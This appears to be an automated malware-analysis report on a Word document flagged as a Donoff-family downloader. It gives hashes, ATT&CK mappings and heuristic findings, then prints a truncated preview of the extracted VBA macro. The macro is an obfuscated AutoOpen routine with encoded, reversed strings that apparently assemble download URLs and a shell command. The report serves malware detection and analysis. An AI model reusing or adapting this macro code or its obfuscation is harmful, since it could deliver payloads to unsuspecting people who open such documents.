Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 07dac7b298c9f5c3…

MALICIOUS

Office (OLE)

Size: 173.5 KB
Created: 2018-05-18 13:24:00
Authoring application: Microsoft Office Word
First seen: 2018-06-30
MD5: 11d40a9f93fc117c73fb67998e0cd318
SHA-1: ebdcea77860fbe86775cb6ecbdf9079ce7e0a937
SHA-256: 07dac7b298c9f5c30603d2bd80fbd8b6e68b591d678cfbe67a54f5f17c5e7784
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro uses a Shell() call, indicating an attempt to execute external code. The ClamAV detection name 'Doc.Downloader.Donoff-7143240-0' strongly suggests that the macro's purpose is to download and execute a secondary payload, which is characteristic of downloader malware. The presence of legacy WordBasic auto-exec markers further supports the malicious nature of the document.

Heuristics (6)

  • ClamAV: Doc.Downloader.Donoff-7143240-0 [severity: critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Donoff-7143240-0
  • VBA macros detected [severity: medium; 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [severity: critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [severity: high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [severity: medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [severity: info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  Filename: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source)
  Size: 173868 bytes
  SHA-256: 8584ffc665fd691b689c78eadbd51b63b7c44fd860839af5ac740db733309291

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "HNaSpWfX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ATTOiw(wzzFc)
For ShuFY = 86172 To 70923
      For ruIzza = 52727 To LlWZF
         AVkCR = ChrB(pbzJD)
      Next
      OTVpR = 32325 * 65647
      JYKOi = fZoMi + COjYV
Next
End Sub
Sub aPwQz(vjLHDV)
For FrCvc = 20749 To 41221
      For vqPnk = 50614 To NAnwU
         pTFsbK = ChrB(wKXWS)
      Next
      dMzTEO = 99713 * 5056
      YjdMZv = KUGBX + XwCAz
Next
For VlSsV = 84020 To 94394
      For NhjiUs = 20672 To ZOPlXc
         DQQVNo = ChrB(QDOzh)
      Next
      GnIUcG = 16996 * 56059
      YjiEdX = lOislP + EWjAKR
Next
For UXLQol = 12342 To 88933
      For RTWRr = 69285 To IKicSz
         oIqLE = ChrB(sGzLFE)
      Next
      Topmh = 83087 * 9699
      ZPzkU = aqjoNU + WIzaC
Next
End Sub
Sub QKVKMn(XUUrva)
For EPttaj = 36883 To 34643
      For RWrjE = 94956 To sMfvoC
         ElztI = ChrB(VotmZ)
      Next
      GPEzS = 54664 * 97396
      DnUDWZ = cfPfGB + oHcqK
Next
For uddFJ = 7294 To 82383
      For nMMTp = 14831 To QQtXiR
         IdHTwu = ChrB(wXbRmA)
      Next
      KPuSiY = 78505 * 35672
      MQtMY = jTbuBU + zqEwqr
Next
End Sub
Sub Autoopen()
On Error Resume Next
For lBDGZF = 1363 To 98546
      For zsEqa = 90690 To EhBEn
         przGL = ChrB(DNmiz)
      Next
      RKNnnS = 82677 * 70048
      bCwiY = nAOom + cLLGT
Next
jcDlfBfBDQr (ivqNKG + GfzhaTPdZuDtB + IkpRu)
For NCtNpC = 53705 To 75273
      For QNXtL = 50859 To wCjUYI
         YOrqQP = ChrB(wiTFY)
      Next
      izVErH = 38336 * 60806
      pRvnTl = laKFOV + zMLXwR
Next
End Sub
Sub EomaGA(ccRoJu)
For audwj = 20680 To 93580
      For uSlMwY = 83307 To jXNzld
         MMkHJ = ChrB(tRFaaX)
      Next
      ibQHi = 20593 * 87089
      ptCIk = iRvzmz + RjvDnv
Next
For AjmXA = 49185 To 95683
      For GGOaj = 77460 To SizYA
         AJdnZ = ChrB(QsUDvP)
      Next
      TJHiHL = 98631 * 50279
      piLNw = QNEOvq + WIkbu
Next
For PmCTLs = 40589 To 25024
      For DrNBl = 81854 To vbMjW
         GwhUBS = ChrB(zufQSK)
      Next
      mPAVd = 64901 * 11028
      MBtFJ = NIPNK + fDmrqC
Next
End Sub
Sub LJMwia(ijbqD)
For Vwmfav = 17778 To 70020
      For mQDHVr = 66323 To IiaHtA
         EKiqU = ChrB(jYJWTi)
      Next
      GRusp = 50303 * 44268
      tbFbzD = Lcjbw + bPRSQE
Next
End Sub

Attribute VB_Name = "rtlCIRW"
Sub jiRTdE(jZPUd)
For Njprm = 60668 To 59994
      For daZVQ = 6981 To qCSihd
         uPHTjP = ChrB(rCvati)
      Next
      vLWlr = 78010 * 12330
      rwMBM = Wzlwjl + ajTwPV
Next
End Sub
Function GfzhaTPdZuDtB()
On Error Resume Next
For XiuXYm = 89709 To 83679
      For zqoVnX = 19189 To fDnUF
         iKtaV = ChrB(DmbSUk)
      Next
      DpcZw = 60358 * 3571
      GuQzCZ = SLiQS + QNfLZ
Next
For RwWcpN = 30118 To 53352
      For BHrPCI = 6199 To bNmpzz
         RfVSw = ChrB(JLzob)
      Next
      SccCK = 2989 * 88077
      TpJUsl = RwCHT + VKJsz
Next
GrrmNaPjmWl = QKKjPq("9Y6r+ydr'+'/ydr+ydr:pttydr+ydrh@ydr+ydr/x9FuQydr+ydrmg/ydr+ydruh.ydr+ydrrihydr'+'+ydrferynydr+ydrodrag/ydr+ydr/:ptth'+' uaO ydr+ydr= Xydr+ydrCDARuU;)331ydr+ydr2ydr+ydr8ydr'+'+ydr2ydr+ydr ,0ydr+ydr00ybQB", 77961 + 4 - 77961, 77961 + 196 - 77961)
For nrwsaa = 89239 To 69713
      For zKcoD = 5517 To bWAZKH
         MzhINz = ChrB(SKMVF)
      Next
      Xzjuw = 2316 * 67271
      nZSPw = inrYVj + jvsShn
Next
For OOaPdi = 56795 To 64804
      For pRjiiM = 2334 To jQhFhi
         DKbEGo = ChrB(SiXJQ)
      Next
      CBnZzm = 54500 * 14510
      qwjdK = ZHjhf + MSCZbB
Next
ADXBb = QKKjPq("SQNBiydr+ydruydr+ydraO( + BSNRydr+ydru'+'ydr+ydrU + '+'uydr+ydraOlydr+ydreoydr+ydruaydr+yd'+'rO +ydr+ydr cilbydr+ydrup:vneydr+ydrR'+'ydr+ydru'+'U =ydr+ydr ydr+ydrCydr+ydrDydr+ydrSRuU;)ydr+ydruaydr+707", 871 + 4 - 871, 871 + 192 - 871)
For wwHVw = 2503 To 92203
    
... (truncated)